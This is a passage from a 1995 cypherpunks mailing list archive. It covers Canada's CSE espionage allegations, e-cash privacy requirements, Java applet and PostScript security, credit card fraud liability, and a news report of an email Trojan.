>    high-tech spy agency snoops on friendly countries for financial gain. 

No big secret??  It was news to me. ;-)

>    Increasingly, intelligence agencies around the world are using their
>    antennas, computers and codebreakers to gather economic information,
>    Wesley Wark, a University of Toronto history professor, said Monday.
>    
>    Some of Canada's largest trading partners--including the United
>    States, France and Japan--comb the airwaves for useful information, so
>    Canada would be foolish not to join the game, said Wark. 

Wark actually continued here.  He said:  "I don't know what a friendly
power in the economic sphere is, exactly, these days.  That seems to be a
very ambiguous term."

(Of course, this is diplo-dodo-speak for something ... I think ... but 
I'm not sure what.)

>    Canada's secretive Communications Security Establishment--an arm of
>    the Defence Department--collects and analyses communications traffic
>    on the activities of foreign states, corporations and people.
>    
>    Jane Shorten, a former CSE employee, told CTV News in an interview
>    Sunday the agency spied on Canada's allies and trading
>    partners--including Mexico and South Korea--by eavesdropping on
>    embassies, consulates and diplomats.

There was also a followup segment, broadcast Monday.  I think that "Jane
Shorten" said that the CSE intercepted telephone conversations and faxes
of Canadians working at FOREIGN embassies in Canada.

But Prime Minister Chretien, in ... New Zealand ... at a meeting of the
Commonwealth did not deny Canada is spying on allies, but he did say that
"This is an organization that works within the law of Canada". 

He also said, "They do not report to me on a daily basis and I cannot make
any comments on if they are spying on anybody.  I don't know.  But they
have the mandate to check a few things around the world.  Probably
somebody is listening to us at this moment." 

Later the Prime Minister said that if any laws have been broken, "somebody
will have to pay the price." 

Ottawa maintains that the CSE, the NSA and their counterparts in Britain, 
Australia, and New Zealand have all agreed not to spy on each other.  He 
also said that the CSE does not target Canadians and scrupulously abides 
by Canadian laws.

"Jane Shorten" said in her Sunday broadcast, "I have lived with this 
information for so long and I just think that it is time that Canada 
knows what the CSE is doing."

"Shorten" worked as an analyst for the CSE from 1986 to 1994 when she was
laid off.  "Shorten" said that the agency spied on Canada's allies and
trading partners, eavesdropping on friendly embassies, consulates, and
diplomats in Canada and around the world. 

Ottawa denies it.  

"Countries like Canada have understandings that they don't carry out these
activities against each other."  Solicitor General Herb Gray said earlier
this year in response to claims that the US Central Intelligence Agency
had spied on the Japanese delegation during auto trade talks in Geneva. 

"Shorten" however replied:  "He does not know what's going on because CSE
is certainly doing that ... I spied on the (South) Korean government for
the Canadian government." 

[I think she was referring to Atomic Energy of Canada's sale of nuclear 
power plants ... possibly ... but I don't know, about AECL.]

Today, it was reported by the deupty prime minister -- since the Prime
Minister is away at an economic conference in Japan -- that there will be
a review of operations to make sure that the Communications Security
Establishment is obeying the law. 

"And if, in fact, there has been illegal activity going on, we'll want to 
deal with that in as public a way as possible," said Sheila Copps.

The Mexican government has presented a diplomatic note to Canada
expressing "surprise and concern" over the report that it was spied on
during the North American free-trade talks. 

South Korea is looking into the matter as well. 

The head of the Canadian Civil Liberties Association wants an independent
committee to oversee CSE operations.  Alan Bovoroy, angered by the
suggestions of spying on Canadians, said a watchdog could put pressure on
politicians to make changes if the CSE steps over the line. 

International diplomacy experts said the allegations of economic espionage
wouldn't damage Ottawa's relations with the countries. 
      
                      --  E N D --


And I guess ... that's all of the news that I've got to this hour.  Except
for one brief note, that Prime Minister Chretien tried to call the States,
but the Government shutdown meant that his call couldn't get through.  
I think he tried to call NASA.

Speaking personally, I just think that something is a bit fishy. I mean 
"Jane Shorten" is a nym if I ever heard one ... probably married to
"Dick Lengthen" or something.  But putting my wry sense of haha, aside 
there are some serious questions.

How does someone cleared for TOP SECRET UMBRA, like our dear "Jane
Shorten" say, "I have lived with this information for so long and I just
think that it is time that Canada knows what CSE is doing."  And then
later say:  "I feel so strongly that its time that people learned what CSE
is all about." 

I mean ... HELLO .... GiGGle TesT ... what on earth did she think the CSE 
did?? Made snowmen and skated on the Rideau Canal??

"Shorten" apparently is quite distraught, over the stepped up CSE
operations in 1991.  Operations targetted at foreign embassies in Canada.
She recalled overhearing conversations of Canadians employed there -- even
one woman's phone call to her doctor.  She was appalled and confronted her
boss, who assured her that the practice was legal. 

I mean, whop dee doo ... "Shorten" overheard a patient/doctor telephone
call that a Canadian made from their place of work -- a foreign embassy.

Did she listen with great intent and intererst, or did she simply try not
to listen??  If "Shorten" was so disraught at listening in on personal
information, she should have closed her ears.  I mean, this is Canada,
what is the problem if we listen to people who work in embassies?? 

The agency IS obligated to destroy information about Canadians it scoops 
up in its electronic net.  A rare exception might be a phone call 
describing a terrorist plot, but that would truly be exceptional, I think.

I mean its not like one big fishing expedition. 

In any event, "Jane Shorten" returned to Canada from New York, this last
evening.  

She told CTV she was aware her revelations could result in
prosecution under the Official Secrets Act but she felt the risk of prison
was worth it. 

And that's the fleshed out version of the story.

I'm just sorry that our Prime Minister is in such a bad position because 
of the timing of this "Jane Shorten's" revelations.  She also revealed 
that Canada spied on Japan.

To think ... Canadian Prime Minister Chretien is a guest of the Japanese
people today.  Talk about some awkward moments.  I mean, what on earth do
you talk about?? 

George Bush and Sushi??




Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.















From denap at isis.com  Thu Nov 16 06:21:29 1995
From: denap at isis.com (Tom DeNapoli)
Date: Thu, 16 Nov 1995 22:21:29 +0800
Subject: Q: blind maildrop anyone?
Message-ID: <199511161409.JAA08809@polyphony.sw.stratus.com>


Hi,

I am not on this mailing list so please reply by email.
It was recommended to me by someone who is on the list that you(s) might
be able to point me to the right place (or page).

What I'd like to do is: establish an email account, other than the one I'm
posting from; preferably on some free email/homepage box, that would encrypt
all cleartext email to hit that account for me at this account.  I have tried,
unsuccessfully to establish this at c2, which offers this service.

My question: has anyone done this successfully at c2, or another location, 
and be willing to point me in the right direction to accomplish this.

thanks,
-Tom 
Tom DeNapoli <denap at isis.com>
26 EC 2B 5A 0B 54 6D EE  1C 3F B6 AE 14 AA 83 87






From rah at shipwright.com  Thu Nov 16 06:30:00 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 22:30:00 +0800
Subject: e$: Come aaaannnndddd Get it!
Message-ID: <v02120d05acd0346e6c23@[199.0.65.105]>


I'm in the process of scrambling to get the e$ web page set up for e-cash
before the deadline for *no-fee* *commercial* accounts at Mark Twain Bank
this Friday, and who should answer the mail but fellow cypherpunk Lucky
Green.

So, Lucky tells me that *he's* the guy who beat up Chaum/MTB and Co. to
prime the pump for web-vendors by offering *free* signup for e-cash
accounts.  Muchos Kudos to Lucky for making that happen.

Sameer's done it, I'm going to do it, and I'm hoping that everyone who
*can* do it *will*.

Lumpy though MTB may be, they're taking a risk that no one else in the
financial community would, and they deserve whatever support we can give
'em.

If they do it and it works, there will be others. Come on, people, let's
make it work.

Put your e$ where your mouth is, or at least on a hard drive somewhere...

http://www.marktwain.com/ecash.html


Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From ddt at lsd.com  Thu Nov 16 07:00:00 1995
From: ddt at lsd.com (Dave Del Torto)
Date: Thu, 16 Nov 1995 23:00:00 +0800
Subject: e$: Financial Cryptography for Dogs, pt. 2.  OpenDoc Kitchen, anyone?
Message-ID: <v03003c06acd09c889725@[129.46.82.91]>


In Reply to the Message wherein it was written:
[elided]
>I've heard about something called an OpenDoc Kitchen, which is a periodic
>>hack fest put on by Apple for developers of OpenDoc parts where code is
>actually written.
>
>My understanding is that this will be held at Apple, in Cupertino, in
>early December.

That was at Apple in Cupertino, 11-13 NOVEMBER, not December. Whoops...I
heard about it from Jose Carreon earlier and should have spoken up sooner,
but there'll be another.

Attendance by Marcel and/or Felix at such a "kitchen" would be an
*excellent* idea. An OpenDoc-ish model will uncoubtedly be the one many
different OS designers (can you say "redmond?") at least copy someday for
look and feel, so it would be smart for DigiCash/Ecash to be in on the
early payment models. And anyway, Marcel could use a relaxing visit to
sunny California so he can hand-lob a grenade at my house. ;)

>They are especially interested in anyone from Digicash who would like to
>make a digital cash OpenDoc component for Cyberdog, because I've been
>ranting to them about this picture in my head of someone dragging digital
>cash icons onto a register icon in a web browser to pay for a purchase.
[elided]

You're on _exactly_ the right track, Robert. I hope everybody listens to
you. As DC -- or perhaps whatever commercial client development company DC
chooses to license the Ecash technology to for spreading this
valuable-to-humanity technology far beyond the reach of "only" the big
financial companies -- well knows, the version _after_ the next version of
the Ecash client will have to be as easy to use as a smartcard if anyone
really expects to [insert your favorite politically-sensitive verb here]
the worldwide flow of value, perhaps making it more convenient for everyone.

The register idea is an interesting one, but I think the belt coin-changer
interface is more to the point, both graphically, and metaphorically. The
non-expert Person in the Street (maybe even the street-people) will do very
well with something like that.

   dave







From froomkin at law.miami.edu  Thu Nov 16 07:08:31 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Thu, 16 Nov 1995 23:08:31 +0800
Subject: Anonymity and Intellectual Capital
In-Reply-To: <199511160148.RAA18908@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951116095111.27012I-100000@viper.law.miami.edu>


For an earlier treatment of a related subject, see my:
Anonymity and Its Enmities 
http://www.law.cornell.edu/jol/froomkin.htm

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From stewarts at ix.netcom.com  Thu Nov 16 23:36:09 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 16 Nov 95 23:36:09 PST
Subject: Java & Netscape security (reply to misc. postings)
Message-ID: <199511170734.XAA12538@ix3.ix.netcom.com>


At 11:33 AM 11/16/95 -0800, Marianne Mueller wrote:

>I think it would be great if either of these two things were to magically
happen:
>
>	1) people would stop putting postscript docs on web pages
>	because it's the wrong technology for WWW - it wastes
>	bandwidth - it's hard to view & hence often ugly - everyone
>	just prints it out anyway and then complains because there
>	is no one "standard" implementation of postscript printing
>	worldwide and there are dozens of minor problems

Postscript is often a better model for applications like WWW -
certainly more flexible than GIFs, and often smaller, for pictures
that are composed of drawings or text-like objects rather than
scanned photographs.  You don't have to worry about resolution
differences, jaggies, and ugliness - just compatibility and
security and memory consumption :-).  It's somewhat the difference
between X and NeWS.  I seldom print Postscript documents out;
I view them with Ghostscript, though lack of a non-HP printer 
affects this...   Viewing java docs on line, with the equations
written as GIFs (without even an alternate text eqn or fortran form)
is much tougher.

>	2) someone could implement a secure postscript previewer
>	(whatever that means!) 
Yep.  If you've got something that limits itself to making marks
on virtual paper and modifying memory in well-defined areas,
that's probably good enough.  I'm hoping Java can do much the same job.

...
> If you have data you can't
>bear to lose, be sure to practice safe computing.  Perform backups
>regularly, and use judgement about which interpreters and executable
>programs you allow to run on your PC.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From rah at shipwright.com  Thu Nov 16 07:48:43 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 23:48:43 +0800
Subject: e$: Financial Cryptography for Dogs, pt. 2.  OpenDoc Kitchen, anyone?
Message-ID: <v02120d03acd1082f811b@[199.0.65.105]>


>That was at Apple in Cupertino, 11-13 NOVEMBER, not December.

The one I'm talking about *is* in fact in December, folks,

Please contact me if you want to come, folks!

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From merriman at arn.net  Thu Nov 16 08:01:40 1995
From: merriman at arn.net (David K. Merriman)
Date: Fri, 17 Nov 1995 00:01:40 +0800
Subject: RSA-perl T-shirt
Message-ID: <199511161547.JAA13166@arnet.arn.net>


I've received several requests, and just want to let *everyone* know that
the T-shirt I have that scanned was from Joel. I must confess that I don't
know why it should make any difference, but.....

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148







From charles at europages.com  Thu Nov 16 08:08:36 1995
From: charles at europages.com (charles at europages.com)
Date: Fri, 17 Nov 1995 00:08:36 +0800
Subject: unsuscribe
Message-ID: <9511161638.AA15806@europages.com>


'unsuscribe'









From tcmay at got.net  Thu Nov 16 10:32:00 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 17 Nov 1995 02:32:00 +0800
Subject: e$: Come aaaannnndddd Get it!
Message-ID: <acd0ba0e02021004a15b@[205.199.118.202]>


At 12:18 PM 11/16/95, Robert Hettinga wrote:
>At 8:57 PM 11/15/95, E. ALLEN SMITH wrote:
>>-------------------
>>        I will as soon as someone comes up with a _fully_ private digital
>>cash system and starts using it for something. As I understand it, Chaum's
>>ecash system is not one (i.e., non-privacy to the sender and of amounts to the
>>bank). If I'm incorrect, please tell me and I'll set up an account with MTB
>>immediately (if there's a text-based interface).
>
>Ahhh. Next year in Jeresalem...
>
>Tell me, are you actually selling something on the net yet? How many
>customers do you have?

Bob, let me do a minor vent here.

You are critical of E. Allen Smith's viewpoint, and essentially question
whether he has anything to sell. Not much of an argument.

Especially when folks are urging that "people put their money where their
mouth is" and get MTB accounts.

Me, I don't plan to sign up for various reasons:

1. I'm not selling anything, and won't sign up just for "moral support." (I
tried this once before, getting an AMIX account early on, and that system
offered more of a chance for a 2-way market. Still, a waste of my time.)

2. I wish Mark Twain Bank well, but the success of the kinds of digital
cash we hope to see will not likely hinge on the success of one particular
operations, such as MTB.

3. The success of BankAmericard (later renamed Visa) came when real
customers and real shops started to use it, not when early pioneers set
themselves up as clearinghouses and whatnot.

I have more interesting things to do, personally, than to be a pioneer so I
can then have nothing to sell, and little to buy....when "interesting
markets" start to appear, I'll look at it again.

In any case, I wish all the pioneers well, and am happy to see Lucky
Green's involvement.

But when you urge people to be pioneers, and they express reservations or
doubts about the system, attacking their motives or implying they have
nothing to sell anyway is not too helpful.

Just my views, but, then, I don't have any customers either.

--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From pjnesser at asgaard.rocket.com  Thu Nov 16 10:57:19 1995
From: pjnesser at asgaard.rocket.com (Philip Nesser)
Date: Fri, 17 Nov 1995 02:57:19 +0800
Subject: primality code
Message-ID: <9511161826.AA10763@asgaard.rocket.com>


-----BEGIN PGP SIGNED MESSAGE-----

Can someone point me in the right direction for any archives of code to do
primality testing?  I would rather not have to right something from
scratch.


- --->  Phil

pjnesser at rocket.com
(206)885-5010x5477 (voice)
(206)882-5750      (fax)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKuBCjeDb3D8TcGFAQGHyAQAg8SXnZrIpQuWznlLxFS0uU0YM5mhwtXj
aG1qtts2vpOzbcNsIyV2zfx01yniOL5E7JycbQWUXJPmN0hRNxCovLWBL2rRJyrQ
KqdVUmaOa7RQqtW/Zx7qyCF3jPG0UZJe4KAJg6InwK6Ts3MS9e57Ft0T5iQG6Ygd
pb1f7+aiEE0=
=NYh0
-----END PGP SIGNATURE-----





From cme at TIS.COM  Thu Nov 16 11:34:41 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 17 Nov 1995 03:34:41 +0800
Subject: Hardware-random-bits interface
In-Reply-To: <199511152205.OAA27271@comsec.com>
Message-ID: <9511161835.AA00247@tis.com>


>Date: Tue, 14 Nov 1995 14:31:46 -0800
>From: Peter Monta <pmonta at qualcomm.com>

>A rate of 300 kB/s will make a 600 MB one-time pad in an hour
>(assuming software is similarly fast).  I'm wondering if any
>of the mail systems have convenient hooks to use pads (though
>it would not be difficult to write up).
>
>Suggestions welcome.  I'll put the design on the Web
>once it's finished; replicating it should be pretty easy.
>People can also grab the device driver if they wish.

I'd be nervous about using a radio receiver which can be fed with a signal
by the adversary.  A noisy resistor or diode should be less subject to bias
by an active opponent.

Whatever you use for a source of bits, it should be carefully measured to
determine how much real entropy is in the source.  Don't assume all the
bits you get are independent, flat distribution bits.

You might need to hash bits down until you get independence.  You also
might want to provide some further ranno conditioning.

	cf. http://www.clark.net/pub/cme/P1363/ranno.html  (on ranno theory)
	and http://www.clark.net/pub/cme/html/ranno.html   (on conditioning)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+






From vznuri at netcom.com  Thu Nov 16 11:42:02 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Fri, 17 Nov 1995 03:42:02 +0800
Subject: credit card conventional wisdom
In-Reply-To: <Pine.HPP.3.91.951115165438.20268D-100000@hawk.twinds.com>
Message-ID: <199511161848.KAA06931@netcom3.netcom.com>



>>  I was attacking the line of thought
>> that goes, "credit card security is already marginal, therefore why 
>> should anyone try to improve it in cyberspace"? this is circular
>> reasoning. "why should anyone try to make something more secure when
>> it is already insecure?"
>> 
>In my post I am looking at this from an economics point of view. Simply
>put: If there is unlimited liability to the credit card holder because
>Mallet is stealing card numbers from the telco switch, encyrpted, plain text,
>it doesn't matter, there will no users.  If there are no users then
>there will be no transaction fees generated, no transaction fees, then it
>won't be deployed.  Therefore, there is no reason to develop the code 
>or even read the latest and greatest specs. and we are all wasting out 
>time.  

I don't believe legal liability is the issue. many businesses operate
despite the fact that they have large liability for what they perform.
the issue is balancing the cost they are guaranteed through their
charges with the liability they face. you are incorrect in thinking that
individual credit card users buy credit cards based on the
liability to themselves, from my point of view. individuals, even
if they are theoretically liable for large fraud costs, simply are not 
going to be able to be held accountable for them.

you seem to be saying that if credit card companies one day guaranteed
they would be responsible for all fraud charges, we would have cybercash
*now*. but credit card companies already do largely have to absorb the
costs of fraud. they are *already* liable. and again, I don't think you
will find the market really cares about liability prior to using 
the service. the individual generally
assumes they are not personally responsible for fraud in the card, and
the companies generally have to adhere to this paradigm.

what if tomorrow a new credit card company started up saying, "we are
not responsible for fraud. all fraud is the responsibility of the 
customer?"  they would be laughed off the planet. such a plan is not
even feasible. the consumer will simply cancel the credit card if they
perceive they are being charged for fraud, and not pay the company 
insisting they are not liable (despite whatever agreement they signed).

>We must recognize that no matter what code we write, how secure it is,
>it won't be used until the banks that must clear the transactions
>agree to accept the risks of loss in return for their transactions fees.

but this has *always* been the case. how is it not the case now? *all*
banks are liable for the security of their schemes. why do you think they
are not? why do you think they care so much about security?

>I haven't seen this from any of this consortiums and would like besides 
>publishing their specs for the best system agree that this risk bearing
>is a necessary step for electronic commerce to become a reality.

why do you think that nobody does not already realize this? isn't it
patently obvious to anyone who starts such a system?

>I would like to see members of the MasterCard and Visa coalitions comment 
>on this aspect of the systems that are promulgating.  The one who cracks
>this nut first without losing their shirt to Mallet will be the winner. The
>others that expect us to deploy systems based upon if Mallet breaks the 
>system, the cardholder and or merchant pays is wasting our time. 

who is proposing that consumers or merchants pay if a system is broken?
why do you think that this is the case? what is more likely is that
these fraud costs will be hidden in transaction charges, just like
they are with current credit cards. the individual consumers and merchants
will then be given the "illusion" that they are not paying for fraud,
but this cost is actually invisibly included in their "transaction
tax".

for the above reasons I don't at all understand why you insist that acceptance 
of liability is the problem delaying introduction of digital cash standards.

but one distinction I do realize has to be made in all this is the
difference between "fraud" and "breaking a system". the latter is
a far more potentially serious problem with cryptographic security than
the former. in fact cryptographic security attempts to deal with all
fraud by making "breaking the system" impossible, and succeeds to the
degree it accomplishes this.







From vznuri at netcom.com  Thu Nov 16 12:39:59 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Fri, 17 Nov 1995 04:39:59 +0800
Subject: credit card conventional wisdom (fwd)
In-Reply-To: <Pine.SOL.3.91.951115184015.18971A-100000@chivalry>
Message-ID: <199511161923.LAA10460@netcom3.netcom.com>



>Card Imprints taken with no online authorisation are typically charged a 
>transaction fee of 3-6%: with authorisation, 1.5-3%.  ATM card 
>transactions  are charged at around $0.10 per transaction.

are you saying that a typical mail order credit card transaction has
a 3-6% charge, because the card is not physically present?

this is a rather shockingly high rate.

again, what I have been calling the "fraud tax"-- it's hidden in every
purchase we make, and when we increase credit card security it will
increasingly be dissipated. but the problem is that no one realizes
this in general, and will argue, "why should we do anything to prevent
fraud? we are already not paying for it right now, why should credit
card companies spend any money to prevent it?"

BZZZZZZZT

I suspect these invisible fraud taxes are quite significant in general
and someone could really become very wealthy by inventing a system that
decreased them.

you might increasingly see retailers offer a "safe card discount"--
some brand of credit card charges them less transaction overhead, and
they pass these savings onto the customer.

or, the credit card company could send the money back to you like 
Discover does.







From jpp at software.net  Thu Nov 16 12:56:22 1995
From: jpp at software.net (John Pettitt (John Pettitt))
Date: Fri, 17 Nov 1995 04:56:22 +0800
Subject: credit card conventional wisdom
Message-ID: <199511161930.LAA20815@software.net>


At 10:48 AM 11/16/95 -0800, Vladimir Z. Nuri wrote:
>
        ... about credit card liability

Hmmm, a few words about credit card liabilty.

The situation now is that in a "card not present" transaction the merchant is
liable for the fraud.  This means that *a lot* of internet based stores are 
getting eaten alive by fraud.  The big issue right now is not cards being
stolen from the telco switch (yes it's a risk but can anybody cite it
happening?).
The issue is authentication of the card user.  We have a significant
investment in 
AI / credit scoring code to defeat the wannabe crackers.  This goes way beyond
mod 10 checks and address verification.

[ as an aside I've put two people in jail this year for card fraud ]

John
John Pettitt, jpp at software.net
VP Engineering, CyberSource Corporation, 415 473 3065






From mrm at netcom.com  Thu Nov 16 13:04:49 1995
From: mrm at netcom.com (Marianne Mueller)
Date: Fri, 17 Nov 1995 05:04:49 +0800
Subject: Java & Netscape security (reply to misc. postings)
Message-ID: <199511161933.LAA18504@netcom20.netcom.com>


Hi Harry & Perry & Jeff & Dr Cohen & "Alice" -

1.  Netscape security: 

Like Jeff said, Netscape 2.0beta has all the same security features as
JDK beta.  (JDK = Java Developer's Kit, the name for our current
product.)  Netscape and Sun have been cooperating closely to
implement, and test, and document the applet security model.  The
applet security manager and the applet class loader are implemented at
the Java layer, for which source code is available from Sun.

Granted, some elements of the the applet security model are
implemented at the Java<-->runtime level, and that's why we have tests
that we run on the appletviewer and on Netscape Navigator.

2.  Corporate security class: 

  Harry asks: 

  | My question is, can a corporate user replace the security class in
  | Netscape. I understand that all the class libs are in an external
  | file. While a virus might exploit this... my reason for asking is for
  | corporate developers who are building "intra"net systems.. making some
  | tweaks to the security class would give them the flexibility they need.
  | Otherwise we have taken much of the fun out of Java. (for good
  | reasons).

The best thing to do if you want to implement your own
intra-corporation security model in the short run is to get a copy of
the beta source code, and take a look at AppletSecurity.java and
AppletClassLoader.java.  You can substitute your own versions of those
for your inhouse use.  This is relatively easy to do with the
appletviewer, and although it's possible to do some binary hack on
moz2_0.car and replace certain files with your own, it's probably not
everyone's cup of tea.  I mean, there's a difference between what you
can do, and what you want to do ... I understand that!

For the next release, we are working on how to enable people to
accomplish what you want to accomplish, in a standard way and in a
usable way, which preserves the applet security model.  The goal is to
design the APIs so that applets can have access to more system
functionality in a secure way.  Presumably what you really want to do
is write applets that have access to file i/o (or what have you), not
re-implement the security manager.


3.  Postscript considered dangerous:   (insert-smiley) 

As for the question of someone invoking a postscript interpreter via a
browser and thus opening up their system to some rogue postscript
file: I think it would be great if either of these two things were to
magically happen:

	1) people would stop putting postscript docs on web pages
	because it's the wrong technology for WWW - it wastes
	bandwidth - it's hard to view & hence often ugly - everyone
	just prints it out anyway and then complains because there
	is no one "standard" implementation of postscript printing
	worldwide and there are dozens of minor problems

	2) someone could implement a secure postscript previewer
	(whatever that means!) 

I doubt either of those two things will happen.  The average Jo on the
internet needs to understand that when s/he downloads binary files
over the internet and run them from insecure programs on their local
computer, well, s/he runs some risk.  This risk might be tiny, but
it's impossible to quantify loss.  If I lose a poem that I'm writing,
to me that's priceless, so I do not intend to imply that loss of data
isn't tragic for the person who loses it.  If you have data you can't
bear to lose, be sure to practice safe computing.  Perform backups
regularly, and use judgement about which interpreters and executable
programs you allow to run on your PC.

Marianne

--
internet fan, mrm at netcom.com
Java Products Group, mrm at eng.sun.com  





From nobody at REPLAY.COM  Thu Nov 16 13:44:20 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 17 Nov 1995 05:44:20 +0800
Subject: Evil Mail
Message-ID: <199511160420.FAA07007@utopia.hacktic.nl>



WSJ, November 15, 1995

America Online to Warn Users About Bad E-Mail


Vienna, Va. -- It's a case of myth becoming reality in
the digital age.

America Online Inc. plans to warn subscribers of a
damaging piece of electronic mail that could corrupt
their computers' hard drives.

The existence of the destructive file follows a long-term
hoax that has been dogging AOL for months. Last year, a
user began circulating a warning about a "Good Times"
virus that would crash users' PCs if they so much as read
the piece of electronic mail. AOL, the Federal
Communications Commission and the Pentagon repeatedly had
to label the alleged virus a hoax.

But the new file is all too real. The destructive file,
attached to electronic mail, has been circulated through
the on-line service and the Internet. Receiving the
e-mail wouldn't harm a user's computer, but trying to run
the attached file, known as AOL Gold or "install.exe,"
could render a hard drive inoperable, an AOL spokeswoman
said.

The company said it has notified various
computer-security agencies about the program. AOL also
plans to post a letter for its four million users
strongly urging them to forgo "downloading attached files
from people you don't know."

Security experts fear that such Trojan Horses will
proliferate as programs become easier to attach to
electronic mail and the use of networks grows.

-----













From EALLENSMITH at ocelot.Rutgers.EDU  Thu Nov 16 13:49:43 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Fri, 17 Nov 1995 05:49:43 +0800
Subject: e$: Come aaaannnndddd Get it!
Message-ID: <01HXPQLC7L688WY0D1@mbcl.rutgers.edu>


	Incidentally, I would like to apologize if I am going over (and not
contributing anything new to) discussion that has already taken place. If
anyone has or knows of an archive of the earlier list messages on the subject
(before I subscribed), I would like to read over them.

From: tcmay at got.net at 16-NOV-1995 13:00:29.05:

At 12:18 PM 11/16/95, Robert Hettinga wrote:
>
>Ahhh. Next year in Jeresalem...
-----------
        Although I am unfortunately not completely familiar with this phrase,
I believe that your meaning here may be that I may be too much of an idealist. 
My position is that I will not use a digital cash system with the significant 
deficits in privacy that the ecash system has. The only exception to this
stance would be if it becomes plain that it is the only alternative to a
credit card system.
        Admittedly, as has been pointed out to me in private email, some
degree of increased privacy in the ecash system can be gotten via
changing currencies using ecash. An example would be dollars to yen
through one changer and back again through another. However, I will not
regard a digital cash system as truly good until it has the following
traits:
        A. Private to any combination except all three of bank, sender, and
receiver.
        B. The bank does not know the amount transacted or owned, unless it
is the sender or receiver. (Obviously, it will know the total amount of
digital cash of its issuance in existence, and how much it has received from
or sent to each person, but it should not need to know anything more).
        C. Double spending is detectable, but does not reveal the identity
of the individual. Thus, the bank does not need to know the identity of
the individual when issuing the digital cash.

        The following are desirable but not strictly neccessary
characteristics:
        A. Offline transactions are possible. To detect double spending, a
transaction with the bank will probably be necessary, but this should
ideally be postponable until the goods purchased are shipped.
        B. Mathematical as opposed to computational authentication and
privacy. Since I am neither a mathematician nor a programmer, I am
uncertain about whether this last is possible. I have my doubts.
--------------

>Tell me, are you actually selling something on the net yet? How many
>customers do you have?
--------------
        If A. such a system as the above were set up and B. I had available
any computer programs, etcetera necessary to use it, then I would at
least _try_ selling something on the net. This something would be not
data itself, but true information- data with interpretations. I am
qualified to produce such a service in some areas in biology and
medicine. I am currently in a Ph.D. program in Molecular Genetics and
Microbiology, and my chief area of interest is gene therapy- I have thus
learned some things about human physiology. Perhaps more importantly than
my own knowledge and experience, I know who to ask and have such
individuals available. Admittedly, I would have to fit it into the time
between exams, or more likely between semesters.
--------------

Bob, let me do a minor vent here.

You are critical of E. Allen Smith's viewpoint, and essentially question
whether he has anything to sell. Not much of an argument.
---------------
        Thank you. (I would say "Thank you for your support," but my name is
neither Bartles (sp?) or James.)
---------------

Especially when folks are urging that "people put their money where their
mouth is" and get MTB accounts.

Me, I don't plan to sign up for various reasons:

1. I'm not selling anything, and won't sign up just for "moral support."
(I tried this once before, getting an AMIX account early on, and that
system offered more of a chance for a 2-way market. Still, a waste of my
time.)
---------------
        I tried signing up for AMIX also, but unfortunately came in too late
(after it closed down). I might consider signing up for a system with the
characteristics described above for "moral support," but I will not do so
for a system that I hope is replaced by a better one.

---------------
2. I wish Mark Twain Bank well, but the success of the kinds of digital
cash we hope to see will not likely hinge on the success of one
particular operations, such as MTB.

3. The success of BankAmericard (later renamed Visa) came when real
customers and real shops started to use it, not when early pioneers set
themselves up as clearinghouses and whatnot.
---------------
        Online commerce systems can be divided into four types, of
increasing level of desirability (and decreasing level of governmental
approval):
